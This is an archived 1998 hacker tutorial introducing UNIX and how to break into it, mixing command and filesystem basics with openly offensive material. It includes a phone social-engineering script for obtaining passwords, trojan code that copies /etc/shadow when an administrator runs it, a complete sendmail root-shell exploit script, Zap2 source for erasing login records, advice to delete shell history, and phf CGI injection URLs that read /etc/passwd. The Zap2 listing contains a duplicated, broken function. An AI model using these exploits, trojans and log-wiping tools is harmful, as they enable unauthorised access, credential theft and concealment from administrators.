Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix_i~2.txt

An Introduction to Hacking Around with the UNIX Operating System, part 1 of 2, by Netdiablo




An Introduction To Hacking Around With The UNIX Operating System
                   By Netdiablo of 616 <ndiablo@complink.net>
                  
    It is surprising that the majority of "hackers" today have little or
no knowledge of the systems they are trying to penetrate. They are the
ones looked down upon by the more experienced, those who run exploits to
get access and then have no idea what to do once they have the access
anyway. This textfile aims to give the newbie, or perhaps even intermediate
user some information on the UNIX system, and how to hack around with it.

    Note that this file does not purport to be the be-all and end-all to
UNIX, even for a beginner textfile. I have seen textfiles on UNIX that
number 50+ pages and still not get the idea across. People have built
entire careers on UNIX security, and obviously it couldnt even all be
explained in an entire set of texts. Mastery requires not only reading and
learning, but real-life experience that comes with time.

Beginning with the basics, UNIX is a multi-user, multitasking operating
system that originated at Bell Labs in the late 1960's. It was created
by engineers that had previously been working on the Multics project, which
was a multitasking, multi-user OS as well, that introduced many of the
security concepts in use today in government certified B2 and B3 level
systems. A small bit of trivia, UNIX was initially started on old GE
mainframes, but quickly moved to DEC PDP series minicomputers. From there,
it was ported to numerous other minicomputers and mainframes, and improved
over the years to the UNIX we know today.

UNIX takes many forms, but can be grouped into two major categories. There
are BSD-derived UNIX systems, and System V based systems. The BSD standard
originated at the University of California-Berkeley and was considered by
many to be superior to AT&T offerings at the time. Many older UNIX systems
were based on it, such as SunOS, and many are based on it now, such as
OpenBSD, NetBSD, and FreeBSD. Other systems have integrated BSD features
into System V, such as Xenix. System V is the current AT&T standard for
UNIX. It really became popular when the University of California-Berkeley
announced that it would no longer be developing BSD. Since then, the rights
to "real" BSD have gone to BSDI, Inc.

So, you might be asking, what the hell does this have to do with hacking?
Nothing. It's simply background, and it's good to know the difference between
System V and BSD anyway.

This file really does two things - it alternates between giving information
on UNIX security, and giving information on UNIX usage.

When you first access a UNIX system, it will probably be by a protocol called
telnet. When you telnet into a UNIX system, you should be able to notice it
by some very standard things about UNIX. A login prompt usually looks like:

<System_Type/Version> (system.name.com) (ttyXX)

login:

At the least, you will see "login:", and that pretty much means you've got
a UNIX system on your hands. Sometimes, the system name and terminal will
be in different positions, or not printed at all. 

At this prompt, you will be expected to login using a valid username. On
UNIX systems, usernames are by standard 8 characters in length, although
that can be extended by the use of special software, although it is
uncommon. Then, you will be prompted for a password, which is also by
standard 8 characters, but can be also lengthened by use of special software.

The UNIX system has several accounts that are installed default onto it
so that essential system services may be run. These typically include:

root: The system administrators account
bin: Owner of system binaries [most default executables on the system]
daemon: Owner of system daemons [programs that run specific services on ports]
adm: Another seldom-used administration account
lp: Owner of printers
sync: Seldom-used account for synching disks
shutdown: Seldom-used account for system shutdown
halt: Seldom-used account for halting system
mail: Owner of some system mail-related files
news: Owner of netnews-related files
uucp: Owner of UUCP binaries, which are, at this time, generally obsolete
operator: Another seldom-used administration account
postmaster: An account that gets misrouted mail and other junk, usually
            alised to root.
            
Although earlier files you might have seen say otherwise, I have found that
all the accounts listed above are always locked out [disabled] EXCEPT for
root. That means that accounts like bin,daemon, adm, lp, and the rest are
useless for login. Root should have a VERY strong password if the admin
is more intelligent than a gorilla. If you really want to try hacking
defaults, though, try using the account name as the password, and also
try words that have a relation to the account. For instance, for an 
administrative account like 'root' you could try passwords like 'admin' or
'sysadmin' or 'manager'. 

You might then be wondering how would one go about getting access on a UNIX
system. There are two major ways of doing this that will be covered in this
file. The first is stealing/guessing/cracking passwords, the most traditional
approach, and then there are buffer overflows. A buffer overflow is an exploit
that consists of overflowing [usually] an input buffer in a program. When that
is done properly, the program will crash, sometimes leaving you with a shell!
If that program happened to be SUID root, then, you just got root!

------------------------------------------------------------------------------
New user definition [SUID]: Set User ID. This is a parameter set on a program
that makes it execute as if it had privelages of the user it is SUID to.
Sometimes this is used with the root account to allow a program to access 
certain files that it might need that are privelaged, for instance, /etc/shadow.
------------------------------------------------------------------------------

The first method, the stealing/guessing/cracking/etc. of passwords is the most
traditional method of getting access to a box. This can be quite simple, such
as social engineering some idiot who has an account on the box and getting them
to give you their username and password, or it can be somewhat complex, like
unshadowing the password file, then running a cracker on it.

-------------------------------------------------------------------------------
New user definition [Social Engineering]: Tricking a computer-illiterate idiot
into giving you useful information that will help you better exploit your 
target system.
-------------------------------------------------------------------------------

One can also guess a password on a system. Possible passwords might be the
users name, the users name backwards, the users birthdate or phone number,
name of a friend or relative, name of the system, or a word that has a relation
to their job or profession.

Social engineering a password can be quite easy or really hard depending on
how stupid and gullible the target is. Obviously, there is a cutoff for this
sort of attack - experienced users will know you are just bullshitting them.
This can be done over the phone, electronically through chat or mail, or in
many other ways!

                    IDIOT: Hello
                    
                    YOU: Hi, i'm with systems administration, and
                    we're planning on moving some of the user home
                    directories onto a larger disk later today.
                    This won't be an inconvenience to you?
                    
                    IDIOT: No, i'll be finished with the system by
                    then.
                    
                    YOU: Ok, we'd like your password so that we can
                    check and see that all your files transferred ok.
                    Your login is "idiot", right?
                    
                    IDIOT: Thats right. My password is "toidi"
                    
                    YOU: Thank-you. I'll be sure to check and see that
                    everything works all right after the move.
                    
                    IDIOT: Thanks
                  
Of course, it is always better to sound as proficient as possible, especially
if the user is very computer illiterate and will be intimidated by the fact
that you will sound knowledgable. However, if you bullshit your way through
with someone who knows what they are doing, you can easily become screwed!

Also, you can steal the systems password file. This can be done remotely,
although it is a bit harder now than it used to be. Exploits can be found
in older versions of Sendmail that will make it mail the password file
to you, and the password file can also be grabbed by FTP if the admin
put the real password file there, although take note that usually one will
find a small, crippled password file in its place. You can also quickly
steal the password file if you can find a system running a protocol like
TFTP, which you will probably never find at this point in time, or other
services, like NFS, can also be manipulated to get access to files remotely.

If you already have an account on the system, it is VERY easy. Simply copy
the password file to your directory, and FTP it off of the system. This can
be done using the following command:

                    cp /etc/passwd /your/home/directory/passwd
                    
or, you could also use a command like:

                    cat /etc/passwd > /your/home/directory/passwd
                   
Then, just FTP it off the system onto your local box, where you can run a
password cracker, like Crack on it.

At this point in time, you might run into another problem. The password
file might be "shadowed". Shadowing is a scheme which attempts to make the
password file a lot harder to steal and crack. In the shadowing scheme, all
the users usual information EXCEPT the password is stored in /etc/passwd, but
the users password is stored in a special file that only root has privelages
to called the shadow file. There are many variations in what the shadow file
is called on different operating systems, but it is usually /etc/shadow on
System V derived systems, or /etc/master.passwd on BSD derived systems.

You can tell if you have a passwd file that is "shadowed" by the fact that
all the entries in the passwd file contain some sort of token, and not the
real passwords. Most common are "x", "*", and "!".

--------------------------------------------------------------------------
Also, for your information, here is a look at the structure of an entry
in the passwd file:

Username:Encrypted Password:UID:GID:GECOS:Home Directory:Shell

It is pretty obvious what the 'Username' and 'Encrypted Password' fields
contain. The UID and GID fields contain the numeric UserID and GroupID
of the account. The GECOS field contains information like the users
real name, phone number, office, and other information which is shown
when you perform a 'finger' query on the user. The 'Home Directory'
and 'Shell' fields are self explanatory as well.
--------------------------------------------------------------------------

Therefore, for all practical reasons,it seems that you have to have root
before you can steal the password file and get actual passwords, but this
is not totally so. There are a few ways around this.

First of all, you can trick the admin into running an application or a
script that is in reality a trojan horse to steal the passwd and shadow
files! Below is an example of a script that will do this:

                    echo "Initializing player information..."
                    cp /etc/shadow /my/home/directory/.shadow
                    cp /etc/passwd /my/home/directory/.passwd
                    chmod 777 /my/home/directory/.shadow
                    chmod 777 /my/home/directory/.passwd
                    echo "Segmentation fault (core dumped)"
                    touch core
                    
This is a decent script, although not really convincing. A better way to do 
this would be to include something like the following in a small C program
and get the admin to run this:

                if (getuid()==0)
                    {
                        system("cp /etc/shadow /my/home/directory/.shadow");
                        system("cp /etc/passwd /my/home/directory/.passwd");
                        system("chmod 777 /my/home/directory/.passwd");
                        system("chmod 777 /my/home/directory/.shadow");
                    }
                else
                    do_other_program_stuff();
                        
This will use the "getuid" function to get the user's UID, and if the UID is
0 (the root UID) then it attempts to steal the password file. However, if the
admin is being secure, and not running it from the root account, the program
will not do anything. This will make it more convincing than if the admin
ran the script under a non-root account and got errors about not having
permissions to /etc/shadow!

-----------------------------------------------------------------------------
New User Definition [UID]: The numerical User ID of a user on a UNIX system.
Each login has a UID that corresponds to it.
-----------------------------------------------------------------------------

You can also use an exploit to attempt to steal parts [or all] or the shadow
file through coredumps. This exploit is available from the rootshell website
under the filename "imapd_core.txt", "telnet_core.txt", and others.

-----------------------------------------------------------------------------
New User Definition [Rootshell]: Rootshell.com, one of the best sites on the
web for getting exploit code and information. Available at the rootshell
website at http://www.rootshell.com

New User Definition [Coredump]: A "core" file is a file that contains the
contents of program's memory space at the time that a program crashed. Used
under normal circumstances as a debugging aid, it can also be used to steal
data by crashing programs and reading the information out of the corefile.
-----------------------------------------------------------------------------

Here is an example of such an exploit, the "imapd_core" exploit from rootshell:

When fed an unknown username, imapd and ipop3d will dump core:

[root@koek] /# telnet zopie 110
Trying 10.10.13.1...
Connected to zopie.attic.vuurwerk.nl.
Escape character is '^]'.
+OK zopie.attic.vuurwerk.nl POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Wa
shington.EDU) at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
user root
+OK User name accepted, password please
pass linux
[this is not the correct password]
-ERR Bad login
user john
[i have no user named john]
+OK User name accepted, password please
pass doe
Connection closed by foreign host.

At this point, ipop3d coredumps in /core:

[root@zopie] /# strings core | grep -A3 root
root
[encrypted pw here]

10244
Sun Feb 1 23:45:15 1998
--
root:[crypted pw here]:10244:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
[looks like my /etc/shadow]
--

------------------------------------------------------------------------------
New User Definition [Disabled Account]: An account can be disabled on a UNIX
system by replacing its password in the /etc/passwd OR /etc/shadow files with
a token, which is usually "*". If password shadowing is in use, this will be
in the /etc/shadow file, if not, this will be in the /etc/passwd file. Do not
confuse this with shadowing, because in shadowing, all the passwords in the
/etc/passwd file will be marked with a token (usually "x" or "*") and you will
have to see the /etc/shadow file to see if they are really disabled.
------------------------------------------------------------------------------

Now, lets assume that you have a password and/or shadow file. Now, you will
have to crack it. First of all, look for password or shadow files that have
users with no password. This can be told by the blank space in the password
field. Then, if you have a shadow file, copy the actual passwords into the
password file and replace the tokens. Now you will have a password file ready
to crack. You can crack password files with several popular programs, some
of which are available on the rootshell website. Some of there programs are
"Crack", which is available for UNIX platforms, and at this time, is at version
5.0. A password cracker called "John The Ripper" is a popular one for DOS
and Windows boxes.

If the cracker comes up with any passwords, then you just got a few new
accounts on the box, and if you come up with a root password, then
congratulations, you just own the box.

Onto the other method, which is the buffer overflow method. Buffer overflows
are commonly done with exploit programs. Buffer overflows take advantage of
poorly written SUID programs. When a buffer overflow is used on a SUID root
program, the program may crash, and in circumstances, leave you with a 
privelaged shell. An example of a buffer overflow exploit for an old version
of Sendmail is shown below:

#/bin/sh
#
#
#                                   Hi !
#                This is exploit for sendmail smtpd bug
#    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
#         This shell script does a root shell in /tmp directory.
#          If you have any problems with it, drop me a letter.
#                                Have fun !
#
#
#                           ----------------------
#               ---------------------------------------------
#    -----------------   Dedicated to my beautiful lady   ------------------
#               ---------------------------------------------
#                           ----------------------
#
#          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c
#
#
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"
|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type:   /tmp/sh"

This exploit is a shell script that echoes some C code into two C files, and
the compiles and runs them, with the result of giving a root shell on systems
running a vulnerable version of sendmail.

There is not much else to say about buffer exploits - they are quickly used
to get access on a system. The question now is what to do once you have
broken into a system.

Once you have broken a system, you can use it as a base of attack against 
other systems, steal files, and other things. If you have taken root, consider
the system your own - you can do whatever you please - add users, delete and
add files, make the system wide open or lock it down. I assume you've read
all the stuff out there on ethics - i'm not gonna say much here but if you
break a system, dont be an ass and do things like removing legitimate users,
deleting the files of legitimate users, crashing the system, or other things
that make true hell for the real day-to-day users of the system.

The remainder of this file will feature commands and strategies for moving
around inside UNIX systems. Once you have gotten into a UNIX system, you will
be logged in, and your shell will start. There are many shells, but the most
numerous of them are the Bourne shell [sh or bash], the C shell [csh], the
Korn shell [ksh], and the Z shell [zsh]. Depending on the system, you will
also see the date of the last login on the account, and the destination from
where it occured. This is important. If you want to prolong your stay on
a system, you must be careful to call as little attention to yourself as
possible. That means WATCH YOUR LOGS. If you have a regular user account, there
is not much you can do but try and stay out of the logs as much as possible,
but if you have root, you can remove your presence entirely! There are many
programs that relieve you from doing this task by hand; a good one is called
Zap2, which is listed below.

#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;

  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}

void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;

    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {

     while(pos != -1L) {
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
          pos = -1L;
        } else {
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
               bzero((char *)&utmp_ent,sizeof(struct utmp ));
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
               write (f, &utmp_ent, sizeof (utmp_ent));
               pos = -1L;
          } else pos += 1L;
        }
     }
     close(f);
  }
}

void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

     if ((pwd=getpwnam(who))!=NULL) {

        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
  }
}

void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

     if ((pwd=getpwnam(who))!=NULL) {

        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }

    } else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
    printf("Error.\n");
}

Using this program, you can make yourself nearly invisible on a machine.
Remember, edit the logs - dont delete them. Deleting or completely destroying
log files is sure to trigger the administrators suspicions. Also, you must 
keep track of your history files. These contain every command you  have entered
while your were logged in, and can be dangerous evidence if you are caught. 
Be sure to look for files like ".history" and ".bash_history" in the home 
directory of the account you are using and delete them! 

So, now that you have access, you will need to know the commands UNIX uses to
get around. You might be familiar with them, as Microsoft ripped off some
of the UNIX command names in DOS. (Note that UNIX commands are case sensitive)

UNIX Command            DOS Equivelant          Function

    ls                      DIR                 List files in directory
    ls -l                   DIR /W              List files in directory [long]
    ls -a                   DIR /AH             List files in directory [all]
    cd                      CD                  Change directory
    rm                      DEL                 Delete file
    cp                      COPY                Copy file
    mv                      MOVE                Move file
    ln                      N/A                 Create "link" to a file
                                                [similar to "shortcuts" in W95]
    ps                      N/A                 Show processes running [you]
    ps -uax                 N/A                 Show processes running
                                                [with extra info, all users]
    w                       N/A                 Show users logged in
    logout                  N/A                 Logout of system
    chmod                   ATTRIB              Change file attributes
    chown                   N/A                 Change file ownership
    man                     HELP                Help on commands [syntax, etc]
    gcc                     N/A                 Compile C files
    cc                      N/A                 Compile C files
    netstat                 N/A                 Show network information
                                                [open connections, etc]
    ifconfig                N/A                 Show information on network
                                                interfaces [e.g. ethernet
                                                cards, ppp links]
    du                      CHKDSK              Show disk usage
    
Obviously, the UNIX command structure is a lot more broad and powerful than
that of DOS. There are hundreds of UNIX commands, with only the common ones
listed above. Now to some more information on the UNIX filesystem.

The UNIX filesystem is also very powerful and advanced. It allows filenames
with names up to 255 characters in some implementations, and you are not
restricted by having to have a three character extention on the end. That
is where filenames like "ssh-1.2.22.tar.gz" come in (heh). The UNIX directory
system uses the "/" character to seperate directories, unlike DOS, which
uses a "\", and, unlike DOS, UNIX does not use "drive letters". In UNIX,
disks are mounted under directories. For instance, one might have two drives.
In DOS, they might be called C: and D:, but in UNIX, they might be mounted
under the "/" directory and the "/usr" directory.

-----------------------------------------------------------------------------
New User Definition [/]: The root directory in UNIX. All other directories are
mounted from here. If this confuses you, think of "/" as "C:\".
-----------------------------------------------------------------------------

The UNIX filesystem also follows, to a certain extent, a standard format. This
is illustrated below in a diagram:

                                    /
/bin    /usr    /var    /etc    /dev  /lost+found  /proc /mnt  /sbin /tmp /home
                    
What is in these directories?
/bin: Contains necessary system binaries, such as ls, rm, etc.
/etc: Contains all system configuration information.
/dev: Contains system device files.
/var: Contains logfiles, mail and news spool directories, etc.
/home: Contains user home directories [sometimes these are in /usr]
/usr: Contains most system executables and files. Binaries in /usr/bin,
      C compiler include files in /usr/include, Manual pages in /usr/man,
      shared libraries in /usr/lib [sometimes this is in /lib].
/lost+found: Contains inodes that may have become corrupted in system
             crashes.
/mnt: Removable drives are sometimes mounted here, such as floppies, etc.
/tmp: Directory where temporary files are stored. Contents of this directory
      are usually deleted everytime the system starts up or reboots.
/proc: This is a "virtual filesystem" that contains information on all the
       processes that are currently running on the system at the time.
/sbin: This is mostly where files used for system diagnostics and
       administration are stored. Sometimes, system daemons are stored here,
       also, instead of in /usr/sbin.

The UNIX filesystem also has a set of bits that set attributes about a file.
Wheras DOS has perhaps three or four attribute bits, UNIX has many more. They
are given in a format as follows:

The UNIX attribute bit system has four positions:

            - --- --- ---
            1  2   3   4
            
The first position is simply a bit that indicates if the file is "special". A
file can be "special" in a number of ways. There are four bits that can be set
in the first position. They are:

d: File is a directory.
l: File is a link.
c: File is a character device.
b: File is a block device.

A file that just has "-" in the first position is simply a regular data or
executable file.

The second position is a set of three bits that indicates what privelages the
owner has in regard to the file. Each bit has one setting, and they are as
follows:

r: User has "read" permission to file.
w: User has "write" permission to file.
x: User has "execute" permission to file.
s: The SUID bit (see below).

There is also a fourth bit, the SUID bit. This will take the place of the "x"
bit, so if you see a file with permissions like "rwsr-xr-x", you know it is
SUID.

The third position is what privelages the members of the group that owns the
file has in regard to the file. It also has three bits with one setting, and
they are the same as above - read, write, and execute.

The fourth and final position is what privelages "other users" have in regard
to the file. "Other users" consists of any user that does not own the file or
that is not in the group that owns the file. It also contains three bits with
one setting each, and they are the same as above also - read, write, and
execute.

Given below are some examples of a "ls -l" directory listing that show the
ownership and permissions on the file.

-r--------  1   root    root    715 Jun 14 16:16    /etc/shadow

Here, the file "/etc/shadow" is owned by the root user and the root group,
and can only be read by the root user. Any other person on the system cannot
read, write to, or execute [run] the file.

lrwxrwxrwx  1   root    root    8   Aug 28 1997 /tmp -> /var/tmp

Here, the file "/tmp" is a link to the directory "/var/tmp".  It is owned by
the root user and the root group, and is readable, writable, and executable
by any user on the system.

drwxr-xr-x  8   root    root    1024    Jun 18 14:15    mothra

Here is a directory, owned by user root and group root. The user root can
read, write to, and execute the directory. The other members of the root
group can read the directory and execute it, but not write to it. Other
users on the system who are not members of the root group or the user root
can also read and execute the directory, but not write to it.

-rw-r--r--  1   ndiablo ndiablo 240 Apr 16 10:32    rksh.c

This file is a regular file, owned by the user ndiablo and the group ndiablo.
The usr ndiablo can read and write to the file, but not execute it (since it
is a textfile, not a program). Other users who are in the ndiablo group can
only read the file, and users on the system who are not ndiablo or in the
ndiablo group can also only read the file.

To put this simply, here is one more diagram:

                           drwxrwxrwx
                           |\ /\ /\ /
                           | |  |  |
                           | |  |  |
               "Special" Bit |  |  |
                             |  |  |
                Privelages For  |  Privelages for
                Owner           |  "Everyone Else"
                                |
                   Privelages For
                   Owning Group
                   Members  
                   
Now that you know the rudimentary UNIX commands, and important information
about the UNIX filesystem, one final thing the beginner should know about UNIX
is some beginner information on it's networking commands. Obviously, you should
find a good tutorial textfile on the Internet and TCP/IP if you are a little
unclear on the workings on the Internet.

UNIX has many networking commands - UNIX and the Internet go hand in hand, 
partially because UNIX is one of the most network-integrated operating systems
there is. Obviously, if you are any sort of UNIX user, you need to know how
to use the power of UNIX on the network. The UNIX network services will be
explained on a protocol-to-protocol basis, covering the major ones.

Port 11: Systat
If you telnet to port 11 on a machine, you might get lucky and have the "who" 
or "ps" command printed out to you. An admin is a total security fool if he
runs this, and is just giving out information that is at the least background 
on hacking the machine, and you can often find valid account names or find out
what programs are being run on the system through this.

Port 15: Netstat
If you telnet to port 15 on a machine, you might also get lucky and have the
"netstat" command printed out to you. Also, an admin would be a total moron
to run this service, and it gives you more security background on the machine.
Through netstat, you can get an idea of which services the machine serves,
and what systems the machine's users login from.

Port 21: FTP
FTP is the Internet File Transfer Protocol. UNIX runs a FTP daemon [server] on
port 21, which is usually wuftpd or the BSD FTP daemon at this point in time.
UNIX also has a FTP client, which can be accessed by typing "ftp" at your
shell prompt. The syntax for FTP, plus some useful commands are as follows:

At the shell prompt: ftp <ftp.host.com>         \
                                                 >-- To connect to a system
At the "ftp>" prompt: open <ftp.host.com>       /

Once you are connected and have logged in, you can use the "cd" command to
change directories, the "ls" command to list files, the "get" command to
get files, and the "send" command to send files. Typing "help" will give
more help on the FTP client program. You can disconnect by typing "bye" or
"quit" at the FTP prompt.

Port 22: SSH [Not standard, but common]
SSH is the port that the Secure Shell is usually installed on. Secure shell is
a very kewl program that resembles rlogin, but encrypts the session, which
protects against packet sniffing attacks. If the machine you are on has it
installed, you can open a secure shell session to a host using the "ssh"
command. For information on how to use the "ssh" command, just type "ssh"
at your prompt, and it will list all the options for its usage. Normally,
you would use a command like "ssh -l username hostname.com".

Port 23: Telnet
Telnet is the protocol which allows you to remotely login to machines over
the internet and establish a terminal session. The telnet daemon is pretty
standard. You can access the telnet client program by typing "telnet" at
your prompt. It's syntax is really, for most practical purposes, as follows:

At the shell prompt: telnet <host.com> [port number]

The port number is optional, and specifies what port on the machine to
connect to. An example of this is "telnet anubis-gw.dyn.ml.org 25". You can
exit a telnet session by logging out of the machine, or by typing the "escape
character", which is usually ^], and typing "quit" at the "telnet>" prompt.

Port 25: Sendmail
This is the default port for the system mailer, which is MOSTLY sendmail,
but sometimes could be a variant, like qmail, or perhaps a wrapper program,
one example of which is smap from TIS. You normally interface with Sendmail
through the "mail" program. It's syntax is very broad, but usually is something
like the following for most puropses:

At the shell prompt: mail user@host.com

I have the problem that there are lots of quirks to Sendmail that could help
you get access, but as i'd like to keep this file broad, you'll have to look
for specific information on Sendmail in another textfile.

Port 53: BIND (DNS)
This is the domain name server port. The only boxes that should be running this
are a domain's nameservers [obviously]. There are a few exploits, some of which
have come out pretty recently at the time of this writing, that will help you
exploit the BIND daemon to get a shell on a remote system. Again, I havent
really played around with BIND a whole lot, so if you want more information
on the topic, i'll leave it up to you to find a textfile that is more specific
on the topic.

Port 69: TFTP
This is the Trivial FTP Protocol. If you ever find a host running this, quickly
connect and steal the /etc/passwd file. UNIX has a TFTP client, type "tftp"
at your shell prompt and, from that, type "help", or "?" at your "tftp" prompt
for more information. I am not going into much depth here because it is a
seldom-used protocol.

Port 79: Finger
Finger is a protocol that can give you information on users. You can also
create DoS attacks using a technique called "redirecting" if the daemon
supports it. This one is really a mixed bag. For the most part, it doesnt
offer specific security vulnerabilities (although there are exceptions) execpt
providing information that could help you social engineer people. Smart
system admins often turn this one off, but you may find it running on large
computers, or often, ISPs. You can perform a finger query by typing:

At the shell prompt: finger user@host.com

Port 80: HTML
This is the port that HTML is served through. Even the most computer illiterate
idiots will know about this one. There are lotsa clients to interface with
the World Wide Web, a good one for the console [non-graphical] is lynx. Its
syntax as is follows:

At the shell prompt: lynx http://www.host.com

HTML by itself doesnt offer any security vulnerabilities, but CGI really does.
If the admin is a moron, he still might be vulnerable to the "phf" CGI hole,
although at this point in time, its so old its doubtful. Just in case, though,
here is information on the "phf" hole:

You can connect to a site, and use the "phf" CGI program to execute commands
on the remote system. To do this, open up your web browser and type this URL:

http://host.com/cgi-bin/phf/?Qalias=x%0acommand

The "command" is the command string. It follows directly after the "=x%0a"
stuff. For instance, if i wanted to know the UID that the HTTP daemon was
running under, i would enter:

http://host.com/cgi-bin/phf/?Qalias=x%0aid
\                                      /\/
 \                                    /  <-- The command to execute
  \ The URL for exploiting the  hole /  
                                        
Or, if i wanted to type the /etc/passwd file, i would enter:

http://host.com/cgi-bin/phf/?Qalias=X%0a/bin/cat%20/etc/passwd

You may also be able to find other holes, major or minor in system CGI
programs. IRIX machines seem to have a particular problem with this sort
of thing.

Port 110: POP3
POP3 is the Post Office Protocol, Version 3. As shown earlier in this file,
you can exploit certain versions of the POP3 daemon. This daemon is not
usually running on a computer unless the computer is a mailserver. You can
interface with POP using a UNIX program such as Fetchmail. As this is
usually not a standard thing, i'll leave it to you to read the documentation
to Fetchmail.

Port 111: Sun RPC Portmapper
This is the RPC portmapper, which is the daemon that maps port numbers to other
Sun RPC services. There are also some exploits that will allow you to fuck with
the RPC portmapper, although I want to keep this file to the basics, so i'll
leave it to you to look around for more information.

Port 119: NNTP
This is where the Netnews daemon is. If you know what you're doing, you can
spoof netnews from this port. As I dont fuck with Netnews on the whole that
much, i'll leave it to you to find out how to fuck with NNTP.

You might be wondering if there is an easy way to find which ports are open on
a machine. Indeed, there is. Here is a useful program called TCPProbe:

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>

int main(int argc, char **argv)
{
  int probeport = 0;
  struct hostent *host;
  int err, i, net;
  struct sockaddr_in sa;

  if (argc != 2) {
    printf("Usage: %s hostname\n", argv[0]);
    exit(1);
  }

  for (i = 1; i < 1024; i++) {
    strncpy((char *)&sa, "", sizeof sa);
    sa.sin_family = AF_INET;
    if (isdigit(*argv[1]))
      sa.sin_addr.s_addr = inet_addr(argv[1]);
    else if ((host = gethostbyname(argv[1])) != 0)
      strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);
    else {
      herror(argv[1]);
      exit(2);
    }
    sa.sin_family = AF_INET;
    if (isdigit(*argv[1]))
      sa.sin_addr.s_addr = inet_addr(argv[1]);
    else if ((host = gethostbyname(argv[1])) != 0)
      strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);
    else {
      herror(argv[1]);
      exit(2);
    }
    sa.sin_port = htons(i);
    net = socket(AF_INET, SOCK_STREAM, 0);
    if (net < 0) {
      perror("\nsocket");
      exit(2);
    }
    err = connect(net, (struct sockaddr *) &sa, sizeof sa);
    if (err < 0) {
      printf("%s %-5d %s\r", argv[1], i, strerror(errno));
      fflush(stdout);
    } else {
      printf("%s %-5d accepted.                               \n", argv[1], i);
      if (shutdown(net, 2) < 0) {
        perror("\nshutdown");
        exit(2);
      }
    }
    close(net);
  }
  printf("                                                                \r");
  fflush(stdout);
  return (0);
}

This program will scan a machine's ports and report any that are open. It works
quite well, and will run quickly even on a slow PPP or SLIP link.

Now you have covered the basics of getting around in UNIX, and also the basics
of getting access on the UNIX system. If you had noticed, this didnt offer much
ready-to-do stuff, although it did point to where it could be found or learned.
That is the whole point of hacking - don't do it cookie-cutter, that isnt real
hacking. The whole idea is to learn. Presented below are some hacking resources
and contact information.

The RootShell Archive - http://www.rootshell.com
Bugtraq Mailing List Archives - http://www.geek-girl.com/bugtraq
Phrack, Inc. - http://www.phrack.com
HackerZ Hideout - http://www.hackersclub.com/km
DIABLO-NET Security Archives ftp://anubis-gw.dyn.ml.org/pub/Computer-Security

$ by Netdiablo <ndiablo@complink.net> <root@anubis-gw.dyn.ml.org> 6/19/98 $


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH